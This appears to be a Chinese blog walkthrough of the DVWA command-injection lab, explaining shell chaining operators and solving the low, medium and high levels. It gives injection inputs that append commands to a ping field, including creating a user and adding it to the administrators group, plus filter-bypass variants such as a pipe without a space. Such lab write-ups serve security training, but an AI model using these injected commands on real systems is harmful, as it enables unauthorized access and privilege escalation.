DVWA(三)命令注入

ps来源网上:
1.ping命令
ping ip地址 :测试该ip是否在线
ping -n 2 ip地址:Windows系统,发送两次ping包命令。
ping -c 2 ip地址:Linux系统,发送两次ping包命令。
ping 127.0.0.1 :测试本地tcp/ip服务是否正常工作

2.ipconfig命令
ipconfig:Windows系统查看本机ip的命令
ifconfig:Linux系统查看本机ip的命令

3.net user
net user 用户名 密码 /add :Windows系统添加用户命令
net localgroup administrators 用户名 /add:将该用户添加到超级管理员组

4.连接符
ping 127.0.0.1 && ipconfig :如果成功执行第一个命令,则继续执行第二个命令
ping 127.0.0.1 & ipconfig:第一个命令无论执行成功与否,都继续执行第二个命令
ping 127.0.0.1 || ipconfig:第一个命令成功执行,则第二个命令不执行。若第一个命令执行错误,则执行后面命令。
ping 127.0.0.1 | ipconfig:第一个命令无论正确与否,都只执行第二个命令
ping 127.0.0.1 ;ipconfig:Linux系统下的命令,执行第一个和第二个命令。

老规矩我们安全性由低到高走一波

low级别

DVWA(三)命令注入我们先查看网页源代码
DVWA(三)命令注入安全程度为低的源码:
DVWA(三)命令注入我们可以看出该代码是用户输入的 ip 赋值给$target,直接执行ping $target,中间不做任何过滤处理。
这里我们考虑看能不能执行ipconfig命令从而知道该主机的IP地址。
所以我们尝试输入:
127.0.0.1 && ipconfig
127.0.0.1 & ipconfig
127.0.0.1 | ipconfig
127.0.0.1 ; ifconfig
然后得到如下
DVWA(三)命令注入我们发现该漏洞就可以利用这个注入点,为系统创建一个新的用户,并赋予管理员权限。我们输入添加用户的命令
127.0.0.1 && net user test test/add

127.0.0.1&& net localgroup administrators test/add
因为这次是我的本地的靶场然后就出现以下尴尬的场面,火绒直接给我拦了。DVWA(三)命令注入
在这里插入图片描述

所以这个靶场最好安在虚拟机上,要不靶场泄露了,就极有可能被黑客入侵。
DVWA(三)命令注入我们创建了账号为test 密码为test 的用户,输入net user test,发现该用户目前在user组中.
执行第二条命令加入超级管理员组,拥有了超级管理员权限。
记得到最后输入127.0.0.1&&net user test /del命令删除创建的用户。
DVWA(三)命令注入

同理这里可以考虑用burp进行抓包,对输入项进行**。

现在提高难度Meduim级别

看源码
DVWA(三)命令注入
这里我们发现他对&&和;进行了过滤,我们这里考虑用其他符号绕过,
这里我们发现使用&、|、||可以绕过。
所以命令改为
127.0.0.1 & ipconfig
127.0.0.1 || ipconfig
127.0.0.1 | ipconfig

high级别

源码
DVWA(三)命令注入这里我们就看出相较于上一个这个过滤的符号更多了。但我们发现,基本上所有的关键字都被过滤了,但是在“| ",多加了一个空格,导致我们输入|不加空格,是可以绕开的。
所以我们命令改为:
127.0.0.1|ipconfig (|后不加空格)

最后我们看看Impossible级别的

源码
DVWA(三)命令注入明白为什么是impossible了吧!☠